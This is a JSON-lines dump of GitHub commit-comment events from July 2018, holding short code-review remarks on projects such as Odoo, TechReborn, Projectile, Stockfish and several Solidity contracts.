{"id":"8002921692","type":"CommitCommentEvent","actor":{"login":"seb-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29798200,"position":35,"line":35,"path":"addons/base_vat_autocomplete/static/src/js/res_partner_vat_many2one_backend.js","commit_id":"1ded12ae6684386e277663aa9ff4b8eb26fa586e","created_at":"2018-07-23T10:04:59Z","updated_at":"2018-07-23T10:04:59Z","author_association":"NONE","body":"call the search vat directly in the name search on the server\r\nhandle the additional results here on this widget"}},"created_at":"2018-07-23T10:04:59Z"}
{"id":"8002923344","type":"CommitCommentEvent","actor":{"login":"modmuss50"},"repo":{"name":"TechReborn/TechReborn"},"payload":{"comment":{"id":29798202,"position":4,"line":85,"path":"src/main/java/techreborn/blocks/BlockRubberLeaves.java","commit_id":"b3002b6f57f13639380df009315f0aab860900bc","created_at":"2018-07-23T10:05:19Z","updated_at":"2018-07-23T10:05:19Z","author_association":"MEMBER","body":"Same here, this needs to call the super"}},"created_at":"2018-07-23T10:05:19Z"}
{"id":"8002924548","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29798203,"position":5,"line":28,"path":"contracts/Splitter.sol","commit_id":"b2fdff5bdfc8408b8037a15bdf8dd2c567f92d45","created_at":"2018-07-23T10:05:33Z","updated_at":"2018-07-23T10:05:33Z","author_association":"NONE","body":"`msg.sender` is a correct answer, but I have a slight dislike for it in this case because it presumes knowledge of how the `Owned` constructor works.\r\nI prefer the following:\r\n\r\n```solidity\r\naddress tempOwner = getOwner(); // 1 `SLOAD`\r\nrequire(_benefactor != tempOwner); // Only `MLOAD`, which is cheaper\r\nrequire(_firstRecipient != tempOwner); // Only `MLOAD`, which is cheaper\r\nrequire(_secondRecipient != tempOwner); // Only `MLOAD`, which is cheaper\r\n```\r\nThe pattern is, `SLOAD` once, reuse locally."}},"created_at":"2018-07-23T10:05:33Z"}
{"id":"8002924791","type":"CommitCommentEvent","actor":{"login":"stsevdos"},"repo":{"name":"stsevdos/testWebsite"},"payload":{"comment":{"id":29798204,"position":null,"line":null,"path":null,"commit_id":"4b205333df5364e449f168ec1cb05f3683d6d93f","created_at":"2018-07-23T10:05:36Z","updated_at":"2018-07-23T10:05:36Z","author_association":"OWNER","body":"Associating with #3 with this commit."}},"created_at":"2018-07-23T10:05:36Z"}
{"id":"8002926671","type":"CommitCommentEvent","actor":{"login":"bbatsov"},"repo":{"name":"bbatsov/projectile"},"payload":{"comment":{"id":29798206,"position":null,"line":null,"path":null,"commit_id":"b90b950eead64b171d528098d186c19804739aa0","created_at":"2018-07-23T10:05:59Z","updated_at":"2018-07-23T10:05:59Z","author_association":"OWNER","body":"`C-c p` is reserved user keybinding, it should not be used by minor modes. Obviously there's always some potential for conflicts between the keymaps in different minor modes. That's unavoidable, that's why Projectile makes it easy to change the prefix. "}},"created_at":"2018-07-23T10:05:59Z"}
{"id":"8002928829","type":"CommitCommentEvent","actor":{"login":"DovMiller"},"repo":{"name":"DevExpress-Examples/how-to-implement-common-scenarios-within-the-grid-bound-with-the-entitydatasource-ef-e3251"},"payload":{"comment":{"id":29798213,"position":null,"line":null,"path":null,"commit_id":"26e1d7ec531db5229a8716ff245a8804cddeb78a","created_at":"2018-07-23T10:06:25Z","updated_at":"2018-07-23T10:06:25Z","author_association":"NONE","body":"In Both the CS and VB links I get to the VB code!\r\nWhere is the CS Code?!"}},"created_at":"2018-07-23T10:06:25Z"}
{"id":"8002933257","type":"CommitCommentEvent","actor":{"login":"bbatsov"},"repo":{"name":"bbatsov/projectile"},"payload":{"comment":{"id":29798226,"position":null,"line":null,"path":null,"commit_id":"b90b950eead64b171d528098d186c19804739aa0","created_at":"2018-07-23T10:07:21Z","updated_at":"2018-07-23T10:07:21Z","author_association":"OWNER","body":"See https://www.gnu.org/software/emacs/manual/html_node/elisp/Key-Binding-Conventions.html\r\n\r\n> Don't define C-c letter as a key in Lisp programs. Sequences consisting of C-c and a letter (either upper or lower case) are reserved for users; they are the only sequences reserved for users, so do not block them.\r\n"}},"created_at":"2018-07-23T10:07:21Z"}
{"id":"8002936808","type":"CommitCommentEvent","actor":{"login":"xiaoLogin"},"repo":{"name":"linlinjava/litemall"},"payload":{"comment":{"id":29798236,"position":null,"line":null,"path":null,"commit_id":"ced7037f1ad69059920517d7ba99a9d933a32e65","created_at":"2018-07-23T10:08:04Z","updated_at":"2018-07-23T10:08:04Z","author_association":"NONE","body":"system对应的sql文件没有更新"}},"created_at":"2018-07-23T10:08:04Z"}
{"id":"8002938340","type":"CommitCommentEvent","actor":{"login":"vicky199428"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29798243,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-23T10:08:24Z","updated_at":"2018-07-23T10:08:24Z","author_association":"NONE","body":"NICE PROJECT"}},"created_at":"2018-07-23T10:08:24Z"}
{"id":"8002940730","type":"CommitCommentEvent","actor":{"login":"drcrazy"},"repo":{"name":"TechReborn/TechReborn"},"payload":{"comment":{"id":29798248,"position":4,"line":85,"path":"src/main/java/techreborn/blocks/BlockRubberLeaves.java","commit_id":"b3002b6f57f13639380df009315f0aab860900bc","created_at":"2018-07-23T10:08:53Z","updated_at":"2018-07-23T10:08:53Z","author_association":"MEMBER","body":"There is a comment in super: \r\n\r\n   /**\r\n     * Used to determine ambient occlusion and culling when rebuilding chunks for render\r\n     * @deprecated call via {@link IBlockState#isOpaqueCube()} whenever possible. Implementing/overriding is fine.\r\n     */\r\n    public boolean isOpaqueCube(IBlockState state)"}},"created_at":"2018-07-23T10:08:53Z"}
{"id":"8002946777","type":"CommitCommentEvent","actor":{"login":"aleksey-stukalov"},"repo":{"name":"aleksey-stukalov/import-data"},"payload":{"comment":{"id":29798252,"position":null,"line":null,"path":null,"commit_id":"b372afb193bc113130938a872142df2c1f56ed36","created_at":"2018-07-23T10:10:06Z","updated_at":"2018-07-23T10:10:06Z","author_association":"OWNER","body":"Merged"}},"created_at":"2018-07-23T10:10:06Z"}
{"id":"8002949801","type":"CommitCommentEvent","actor":{"login":"modmuss50"},"repo":{"name":"TechReborn/TechReborn"},"payload":{"comment":{"id":29798261,"position":4,"line":85,"path":"src/main/java/techreborn/blocks/BlockRubberLeaves.java","commit_id":"b3002b6f57f13639380df009315f0aab860900bc","created_at":"2018-07-23T10:10:41Z","updated_at":"2018-07-23T10:10:41Z","author_association":"MEMBER","body":"Yeah, that's the usual way of doing it, but because this super of this method in BlockLeaves handles if the leaves are fancy or not, this will no longer work. (Assuming the that state doesn't know if the leaves are fancy or not)"}},"created_at":"2018-07-23T10:10:41Z"}
{"id":"8002956101","type":"CommitCommentEvent","actor":{"login":"seagle0128"},"repo":{"name":"bbatsov/projectile"},"payload":{"comment":{"id":29798269,"position":null,"line":null,"path":null,"commit_id":"b90b950eead64b171d528098d186c19804739aa0","created_at":"2018-07-23T10:11:57Z","updated_at":"2018-07-23T10:11:57Z","author_association":"NONE","body":"Thanks for the information!"}},"created_at":"2018-07-23T10:11:57Z"}
{"id":"8002959257","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29798278,"position":22,"line":22,"path":"contracts/SplitterUtility.sol","commit_id":"19438b2ecb97cb416709db96ebb199f6bcde1796","created_at":"2018-07-23T10:12:37Z","updated_at":"2018-07-23T10:12:37Z","author_association":"NONE","body":"That's one pithy event..."}},"created_at":"2018-07-23T10:12:37Z"}
{"id":"8002964426","type":"CommitCommentEvent","actor":{"login":"kocur4d"},"repo":{"name":"Anianias7/LoginPage"},"payload":{"comment":{"id":29798284,"position":4,"line":4,"path":"src/Components/Heading/Heading.js","commit_id":"1c42efe7679abf70474e97d04af3b38fed96aaea","created_at":"2018-07-23T10:13:43Z","updated_at":"2018-07-23T10:13:43Z","author_association":"NONE","body":"By convention all react components should start with a capital? so `Heading`\r\n\r\nWhat do you think?"}},"created_at":"2018-07-23T10:13:43Z"}
{"id":"8002969229","type":"CommitCommentEvent","actor":{"login":"kocur4d"},"repo":{"name":"Anianias7/LoginPage"},"payload":{"comment":{"id":29798290,"position":12,"line":12,"path":"src/Components/Heading/Heading.js","commit_id":"1c42efe7679abf70474e97d04af3b38fed96aaea","created_at":"2018-07-23T10:14:43Z","updated_at":"2018-07-23T10:14:43Z","author_association":"NONE","body":"I really like this pattern:\r\n\r\n```\r\nimport ...\r\n\r\nconst Component = ...\r\n\r\nexport default Component\r\n```\r\n\r\n:+1:"}},"created_at":"2018-07-23T10:14:43Z"}
{"id":"8002972667","type":"CommitCommentEvent","actor":{"login":"FunkyloverOne"},"repo":{"name":"RokaUA/ski_rent_api"},"payload":{"comment":{"id":29798300,"position":6,"line":6,"path":"db/migrate/20180723095808_create_user.rb","commit_id":"b4ac0537cfdbea496f4d76f785ee29ba3fed6e74","created_at":"2018-07-23T10:15:23Z","updated_at":"2018-07-23T10:15:23Z","author_association":"NONE","body":"add `t.timestamps` here"}},"created_at":"2018-07-23T10:15:23Z"}
{"id":"8002973908","type":"CommitCommentEvent","actor":{"login":"kocur4d"},"repo":{"name":"Anianias7/LoginPage"},"payload":{"comment":{"id":29798303,"position":15,"line":15,"path":"src/Components/Heading/HeadingWrapper.js","commit_id":"1c42efe7679abf70474e97d04af3b38fed96aaea","created_at":"2018-07-23T10:15:39Z","updated_at":"2018-07-23T10:15:39Z","author_association":"NONE","body":"always remove trailing empty lines and paces. Some linter like `eslint` can be used to help."}},"created_at":"2018-07-23T10:15:39Z"}
{"id":"8002974168","type":"CommitCommentEvent","actor":{"login":"sdroege"},"repo":{"name":"sdroege/gst-plugin-threadshare"},"payload":{"comment":{"id":29798304,"position":79,"line":274,"path":"src/socket.rs","commit_id":"3deb93a2a22f851d4d2f4576c87596cce6e7b936","created_at":"2018-07-23T10:15:42Z","updated_at":"2018-07-23T10:15:42Z","author_association":"OWNER","body":"Sorry for not explaining it more clear. basically like this:\r\n\r\n```rust\r\nlet dts = if T::DO_TIMESTAMP {\r\n    let time = inner.clock.as_ref().unwrap().get_time();\r\n    let running_time = time - inner.base_time.unwrap();\r\n    gst_debug!(SOCKET_CAT, obj: &inner.element, \"Read {} bytes at {} (clock {})\", len, running_time, time);\r\n    running_time\r\n} else {\r\n    gst_debug!(SOCKET_CAT, obj: &inner.element, \"Read {} bytes\", len);\r\n    gst::CLOCK_TIME_NONE\r\n};\r\n```"}},"created_at":"2018-07-23T10:15:42Z"}
{"id":"8002976646","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29798309,"position":26,"line":26,"path":"contracts/SplitterUtility.sol","commit_id":"19438b2ecb97cb416709db96ebb199f6bcde1796","created_at":"2018-07-23T10:16:12Z","updated_at":"2018-07-23T10:16:12Z","author_association":"NONE","body":"You use this `splitSequence` only for information purposes am I right? I see no contract logic based on it. Unless you can make a strong, strong!, case that a derivative contract would use this for some logic, you can move all of it into the events.\r\n"}},"created_at":"2018-07-23T10:16:12Z"}
{"id":"8002977491","type":"CommitCommentEvent","actor":{"login":"kocur4d"},"repo":{"name":"Anianias7/LoginPage"},"payload":{"comment":{"id":29798313,"position":3,"line":3,"path":"src/Components/Input.js","commit_id":"1c42efe7679abf70474e97d04af3b38fed96aaea","created_at":"2018-07-23T10:16:22Z","updated_at":"2018-07-23T10:16:22Z","author_association":"NONE","body":"Same as above I would change it to `Input`"}},"created_at":"2018-07-23T10:16:22Z"}
{"id":"8002977817","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29798314,"position":35,"line":35,"path":"contracts/SplitterUtility.sol","commit_id":"19438b2ecb97cb416709db96ebb199f6bcde1796","created_at":"2018-07-23T10:16:26Z","updated_at":"2018-07-23T10:16:26Z","author_association":"NONE","body":"`uint(`"}},"created_at":"2018-07-23T10:16:26Z"}
{"id":"8002979862","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29798317,"position":35,"line":35,"path":"contracts/SplitterUtility.sol","commit_id":"19438b2ecb97cb416709db96ebb199f6bcde1796","created_at":"2018-07-23T10:16:53Z","updated_at":"2018-07-23T10:16:53Z","author_association":"NONE","body":"Because if you have a very large `_forFirst`, `int(_forFirst) may be negative."}},"created_at":"2018-07-23T10:16:53Z"}
{"id":"8002980106","type":"CommitCommentEvent","actor":{"login":"sdroege"},"repo":{"name":"sdroege/gst-plugin-threadshare"},"payload":{"comment":{"id":29798318,"position":79,"line":274,"path":"src/socket.rs","commit_id":"3deb93a2a22f851d4d2f4576c87596cce6e7b936","created_at":"2018-07-23T10:16:56Z","updated_at":"2018-07-23T10:16:56Z","author_association":"OWNER","body":"And in the TCP source you simply set the clock to `None` in `::start()`. It will be `None` in `gst::State::Ready`"}},"created_at":"2018-07-23T10:16:56Z"}
{"id":"8002984856","type":"CommitCommentEvent","actor":{"login":"netcarver"},"repo":{"name":"outflux3/AdminCustomFiles"},"payload":{"comment":{"id":29798332,"position":null,"line":null,"path":null,"commit_id":"7ea7a4aa82989681524fda970a3071f9630e4051","created_at":"2018-07-23T10:17:53Z","updated_at":"2018-07-23T10:17:53Z","author_association":"NONE","body":"Hi Marc,\r\nThis looks good, any chance of a PR back to the main project?"}},"created_at":"2018-07-23T10:17:53Z"}
{"id":"8002985676","type":"CommitCommentEvent","actor":{"login":"zgbjmy2009"},"repo":{"name":"Zheng-Wenkai/WX_checkAttendanceDemo"},"payload":{"comment":{"id":29798337,"position":null,"line":null,"path":null,"commit_id":"19d77ca4eb86fa1768811c67d7c020a78c3a8a05","created_at":"2018-07-23T10:18:03Z","updated_at":"2018-07-23T10:18:03Z","author_association":"NONE","body":"你好，请教下本地如何配置下相应的数据库？不然直接运行还是会报3个错误的"}},"created_at":"2018-07-23T10:18:03Z"}
{"id":"8002988036","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29798341,"position":37,"line":37,"path":"contracts/SplitterUtility.sol","commit_id":"19438b2ecb97cb416709db96ebb199f6bcde1796","created_at":"2018-07-23T10:18:31Z","updated_at":"2018-07-23T10:18:31Z","author_association":"NONE","body":"No, I prefer testing a subtraction like that `runningBalances[msg.sender] >= uint(msg.value)`"}},"created_at":"2018-07-23T10:18:31Z"}
{"id":"8002990278","type":"CommitCommentEvent","actor":{"login":"Zerbinati"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":29798344,"position":null,"line":null,"path":null,"commit_id":"518452188595d6991ca3e122d1129e77b284dd38","created_at":"2018-07-23T10:18:58Z","updated_at":"2018-07-23T10:18:58Z","author_association":"NONE","body":"@Stefano80 \r\nThe compilation shows these warnings:\r\nse3 -mpopcnt -DUSE_POPCNT   -c -o syzygy/tbprobe.o syzygy/tbprobe.cpp\r\nIn file included from evaluate.h:26:0,\r\n                 from search.cpp:28:\r\ntypes.h: In member function 'virtual void Thread::search()':\r\ntypes.h:284:63: warning: 'playoutValue' may be used uninitialized in this functi\r\non [-Wmaybe-uninitialized]\r\n constexpr T operator-(T d1, T d2) { return T(int(d1) - int(d2)); } \\\r\n                                                               ^\r\nsearch.cpp:283:20: note: 'playoutValue' was declared here\r\n   Value bestValue, playoutValue, alpha, beta, delta;\r\n                    ^~~~~~~~~~~~\r\nx86_64-w64-mingw32-g++ -o stockfish.exe benchmark.o bitbase.o bitboard.o endgame"}},"created_at":"2018-07-23T10:18:58Z"}
{"id":"8002990532","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29798345,"position":36,"line":36,"path":"contracts/SplitterUtility.sol","commit_id":"19438b2ecb97cb416709db96ebb199f6bcde1796","created_at":"2018-07-23T10:19:01Z","updated_at":"2018-07-23T10:19:01Z","author_association":"NONE","body":"Also, consider saving gas by doing `SLOAD` as fewer times as possible."}},"created_at":"2018-07-23T10:19:01Z"}
{"id":"8002990833","type":"CommitCommentEvent","actor":{"login":"0legKot"},"repo":{"name":"0legKot/Godsend"},"payload":{"comment":{"id":29798346,"position":null,"line":null,"path":null,"commit_id":"4f07e7109117939f7b28c43ac088b4bbf46bee78","created_at":"2018-07-23T10:19:05Z","updated_at":"2018-07-23T10:19:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add roles](https://trello.com/c/hCegfpDb/38-add-roles)"}},"created_at":"2018-07-23T10:19:05Z"}
{"id":"8002990925","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29798349,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-23T10:19:06Z","updated_at":"2018-07-23T10:19:06Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-23T10:19:06Z"}
{"id":"8002991458","type":"CommitCommentEvent","actor":{"login":"netcarver"},"repo":{"name":"phlppschrr/AdminCustomFiles"},"payload":{"comment":{"id":29798350,"position":null,"line":null,"path":null,"commit_id":"f7a0945533cf69811043a5179a23541ae7faa43f","created_at":"2018-07-23T10:19:12Z","updated_at":"2018-07-23T10:19:12Z","author_association":"NONE","body":"Hi @phlppschrr If this is not back in the main project, any chance of issuing a PR to get it in?"}},"created_at":"2018-07-23T10:19:12Z"}
{"id":"8002997824","type":"CommitCommentEvent","actor":{"login":"Anianias7"},"repo":{"name":"Anianias7/LoginPage"},"payload":{"comment":{"id":29798364,"position":4,"line":4,"path":"src/Components/Heading/Heading.js","commit_id":"1c42efe7679abf70474e97d04af3b38fed96aaea","created_at":"2018-07-23T10:20:29Z","updated_at":"2018-07-23T10:20:29Z","author_association":"OWNER","body":"I've read that stateless components should be written with a lowerCamelCase notation"}},"created_at":"2018-07-23T10:20:29Z"}
{"id":"8003000395","type":"CommitCommentEvent","actor":{"login":"netcarver"},"repo":{"name":"Rayden/AdminCustomFiles"},"payload":{"comment":{"id":29798371,"position":null,"line":null,"path":null,"commit_id":"7c489f6ef447428e06b3a35c17e54f14a8552848","created_at":"2018-07-23T10:21:04Z","updated_at":"2018-07-23T10:21:04Z","author_association":"NONE","body":"@Rayden Hi Raymond, any chance of a PR back into the main project?"}},"created_at":"2018-07-23T10:21:04Z"}
{"id":"8003002296","type":"CommitCommentEvent","actor":{"login":"hbvhuwe"},"repo":{"name":"hbvhuwe/explorer-github"},"payload":{"comment":{"id":29798374,"position":null,"line":null,"path":null,"commit_id":"ef3ae9e2e719fa2bb6964086083bf93c467de734","created_at":"2018-07-23T10:21:27Z","updated_at":"2018-07-23T10:21:27Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [UserDao + UserRepository](https://trello.com/c/ePQB3JzV/1-userdao-userrepository)"}},"created_at":"2018-07-23T10:21:27Z"}
{"id":"8003002756","type":"CommitCommentEvent","actor":{"login":"FunkyloverOne"},"repo":{"name":"RokaUA/ski_rent_api"},"payload":{"comment":{"id":29798376,"position":6,"line":6,"path":"db/migrate/20180723100107_create_item.rb","commit_id":"b4ac0537cfdbea496f4d76f785ee29ba3fed6e74","created_at":"2018-07-23T10:21:33Z","updated_at":"2018-07-23T10:21:33Z","author_association":"NONE","body":"remove `class_name`, and use `foreign_key: true`"}},"created_at":"2018-07-23T10:21:33Z"}
{"id":"8003003135","type":"CommitCommentEvent","actor":{"login":"hbvhuwe"},"repo":{"name":"hbvhuwe/explorer-github"},"payload":{"comment":{"id":29798377,"position":null,"line":null,"path":null,"commit_id":"ef3ae9e2e719fa2bb6964086083bf93c467de734","created_at":"2018-07-23T10:21:38Z","updated_at":"2018-07-23T10:21:38Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [RepoDao + RepoRepository](https://trello.com/c/K9zMmIYU/2-repodao-reporepository)"}},"created_at":"2018-07-23T10:21:38Z"}
{"id":"8003004141","type":"CommitCommentEvent","actor":{"login":"FunkyloverOne"},"repo":{"name":"RokaUA/ski_rent_api"},"payload":{"comment":{"id":29798378,"position":5,"line":5,"path":"db/migrate/20180723100107_create_item.rb","commit_id":"b4ac0537cfdbea496f4d76f785ee29ba3fed6e74","created_at":"2018-07-23T10:21:50Z","updated_at":"2018-07-23T10:21:50Z","author_association":"NONE","body":"please use cents instead"}},"created_at":"2018-07-23T10:21:50Z"}
{"id":"8003006875","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29798386,"position":54,"line":54,"path":"contracts/SplitterUtility.sol","commit_id":"19438b2ecb97cb416709db96ebb199f6bcde1796","created_at":"2018-07-23T10:22:23Z","updated_at":"2018-07-23T10:22:23Z","author_association":"NONE","body":"To me, this line makes the whole function wrong on an accounting point of view. You break an invariant.\r\nThe invariant is `sum_of(all_runningBalances_before) + msg.value == sum_of(all_runningBalances_after) == this.balance`.\r\nThis function fails that."}},"created_at":"2018-07-23T10:22:23Z"}
{"id":"8003007804","type":"CommitCommentEvent","actor":{"login":"Oubunhaku"},"repo":{"name":"Oubunhaku/deeplearningclass"},"payload":{"comment":{"id":29798388,"position":null,"line":null,"path":null,"commit_id":"0261cd18f271daa11be25bfc2fdbe2f1b863ac5c","created_at":"2018-07-23T10:22:34Z","updated_at":"2018-07-23T10:22:34Z","author_association":"OWNER","body":"Colaboratory"}},"created_at":"2018-07-23T10:22:34Z"}
{"id":"8003007854","type":"CommitCommentEvent","actor":{"login":"JeffreyLeonard"},"repo":{"name":"bitcoin-wallet/bitcoin-wallet"},"payload":{"comment":{"id":29798389,"position":null,"line":null,"path":null,"commit_id":"ff2e563076f061877ab04e6df553c477dd6d3045","created_at":"2018-07-23T10:22:35Z","updated_at":"2018-07-23T10:22:35Z","author_association":"NONE","body":"Is this good"}},"created_at":"2018-07-23T10:22:35Z"}
{"id":"8003040528","type":"CommitCommentEvent","actor":{"login":"kierank"},"repo":{"name":"Upipe/upipe"},"payload":{"comment":{"id":29798467,"position":616,"line":616,"path":"lib/upipe-ts/upipe_rtp_fec.c","commit_id":"ea2bedd6ca8523b81140397d56fe0c3793463d8c","created_at":"2018-07-23T10:29:29Z","updated_at":"2018-07-23T10:29:29Z","author_association":"CONTRIBUTOR","body":"Input packet could be reordered, this is wrong."}},"created_at":"2018-07-23T10:29:29Z"}
{"id":"8003046041","type":"CommitCommentEvent","actor":{"login":"kocur4d"},"repo":{"name":"Anianias7/LoginPage"},"payload":{"comment":{"id":29798474,"position":7,"line":7,"path":"src/Containers/Error/Error.js","commit_id":"1c42efe7679abf70474e97d04af3b38fed96aaea","created_at":"2018-07-23T10:30:25Z","updated_at":"2018-07-23T10:30:25Z","author_association":"NONE","body":"Very minor but for ternary I like to do:\r\n\r\n```\r\nreturn messages.length === 0 \r\n  ? null\r\n  :  <ErrorWrapper>{messages.map(msg => <p key={msg}>{msg}</p>)}</ErrorWrapper>\r\n```\r\n\r\nBut in this case because one of the is `null` you dont need ternary at all\r\n\r\n```\r\n  return messages.length === 0 <ErrorWrapper>{messages.map(msg => <p key={msg}>{msg}</p>)}</ErrorWrapper>\r\n``` "}},"created_at":"2018-07-23T10:30:25Z"}
{"id":"8003047266","type":"CommitCommentEvent","actor":{"login":"FelixSFD"},"repo":{"name":"Zomis/Duga"},"payload":{"comment":{"id":29798476,"position":50,"line":114,"path":"duga-core/src/main/java/net/zomis/duga/chat/StackExchangeLogin.java","commit_id":"51a33a9fc90ce40a4d381c679eb0b84ea4bae089","created_at":"2018-07-23T10:30:38Z","updated_at":"2018-07-23T10:30:38Z","author_association":"NONE","body":"if `configuration.getRootUrl()` is `stackexchange.com`, you need to send this request to `meta.stackexchange.com`. (but don't change the URL in `configuration`, since you have to send the request in line 120 to `stackexchange.com`"}},"created_at":"2018-07-23T10:30:38Z"}
{"id":"8003051749","type":"CommitCommentEvent","actor":{"login":"kocur4d"},"repo":{"name":"Anianias7/LoginPage"},"payload":{"comment":{"id":29798486,"position":9,"line":9,"path":"src/Containers/Error/ErrorWrapper.js","commit_id":"1c42efe7679abf70474e97d04af3b38fed96aaea","created_at":"2018-07-23T10:31:32Z","updated_at":"2018-07-23T10:31:32Z","author_association":"NONE","body":"Extra lines"}},"created_at":"2018-07-23T10:31:32Z"}
{"id":"8003053043","type":"CommitCommentEvent","actor":{"login":"kocur4d"},"repo":{"name":"Anianias7/LoginPage"},"payload":{"comment":{"id":29798494,"position":7,"line":7,"path":"src/Containers/Form/Form.js","commit_id":"1c42efe7679abf70474e97d04af3b38fed96aaea","created_at":"2018-07-23T10:31:50Z","updated_at":"2018-07-23T10:31:50Z","author_association":"NONE","body":"line"}},"created_at":"2018-07-23T10:31:50Z"}
{"id":"8003053476","type":"CommitCommentEvent","actor":{"login":"kocur4d"},"repo":{"name":"Anianias7/LoginPage"},"payload":{"comment":{"id":29798497,"position":11,"line":11,"path":"src/Containers/Form/Form.js","commit_id":"1c42efe7679abf70474e97d04af3b38fed96aaea","created_at":"2018-07-23T10:31:56Z","updated_at":"2018-07-23T10:31:56Z","author_association":"NONE","body":"more lines"}},"created_at":"2018-07-23T10:31:56Z"}
{"id":"8003054018","type":"CommitCommentEvent","actor":{"login":"kocur4d"},"repo":{"name":"Anianias7/LoginPage"},"payload":{"comment":{"id":29798500,"position":30,"line":30,"path":"src/Containers/Form/Form.js","commit_id":"1c42efe7679abf70474e97d04af3b38fed96aaea","created_at":"2018-07-23T10:32:03Z","updated_at":"2018-07-23T10:32:03Z","author_association":"NONE","body":"more lines"}},"created_at":"2018-07-23T10:32:03Z"}
{"id":"8003054886","type":"CommitCommentEvent","actor":{"login":"mosra"},"repo":{"name":"mosra/magnum"},"payload":{"comment":{"id":29798502,"position":25,"line":80,"path":"src/Magnum/Text/DistanceFieldGlyphCache.cpp","commit_id":"7bf56e9fb07725b407526bd1aed192346a164559","created_at":"2018-07-23T10:32:15Z","updated_at":"2018-07-23T10:32:15Z","author_association":"OWNER","body":"If only that was the only typo :sweat_smile: "}},"created_at":"2018-07-23T10:32:15Z"}
{"id":"8003063901","type":"CommitCommentEvent","actor":{"login":"phlppschrr"},"repo":{"name":"phlppschrr/AdminCustomFiles"},"payload":{"comment":{"id":29798517,"position":null,"line":null,"path":null,"commit_id":"f7a0945533cf69811043a5179a23541ae7faa43f","created_at":"2018-07-23T10:34:12Z","updated_at":"2018-07-23T10:34:12Z","author_association":"OWNER","body":"@netcarver Haha, nice find. I stopped using AdminCustomFiles, and I think there is no need for this drop-in anymore as ProcessWire textfields now have a native \"counter\" setting. Everything else I solved with this module is now covered by the AdminOnSteroids module.\r\n\r\nBut if you want I can still make a PR.\r\n"}},"created_at":"2018-07-23T10:34:12Z"}
{"id":"8003068856","type":"CommitCommentEvent","actor":{"login":"labdsf"},"repo":{"name":"melmothx/text-amuse"},"payload":{"comment":{"id":29798523,"position":30,"line":30,"path":"t/bidi.t","commit_id":"663ee83ee3bba7a863070ed0644397816920d23a","created_at":"2018-07-23T10:35:14Z","updated_at":"2018-07-23T10:35:14Z","author_association":"CONTRIBUTOR","body":"s/rigth/right/"}},"created_at":"2018-07-23T10:35:14Z"}
{"id":"8003074276","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29798529,"position":159,"line":191,"path":"contracts/RockPaperScissors.sol","commit_id":"a6c7ba343527340cbed5541a52fafaf6cfaedf25","created_at":"2018-07-23T10:36:25Z","updated_at":"2018-07-23T10:36:25Z","author_association":"NONE","body":"Maybe my comment elsewhere got lost.\r\nThere, I was saying that the inviter could always front run the invitee, by sending a cancel transaction, when the inviter sees that the un-mined transaction contains a plain text move that makes the inviter lose."}},"created_at":"2018-07-23T10:36:25Z"}
{"id":"8003085540","type":"CommitCommentEvent","actor":{"login":"berns00"},"repo":{"name":"berns00/BernsTool"},"payload":{"comment":{"id":29798539,"position":null,"line":null,"path":null,"commit_id":"d8a1d2849fa2dd2aa23131cbf79b53e444badd1c","created_at":"2018-07-23T10:38:49Z","updated_at":"2018-07-23T10:38:49Z","author_association":"OWNER","body":"CiaoDi seguito sono riportate le classi da implementare/testare"}},"created_at":"2018-07-23T10:38:49Z"}
{"id":"8003090267","type":"CommitCommentEvent","actor":{"login":"Kenta1561"},"repo":{"name":"Kenta1561/test-meme"},"payload":{"comment":{"id":29798547,"position":null,"line":null,"path":null,"commit_id":"10726fff029ece19b01388a2681ba46a43bb7915","created_at":"2018-07-23T10:39:52Z","updated_at":"2018-07-23T10:39:52Z","author_association":"OWNER","body":"test comment"}},"created_at":"2018-07-23T10:39:52Z"}
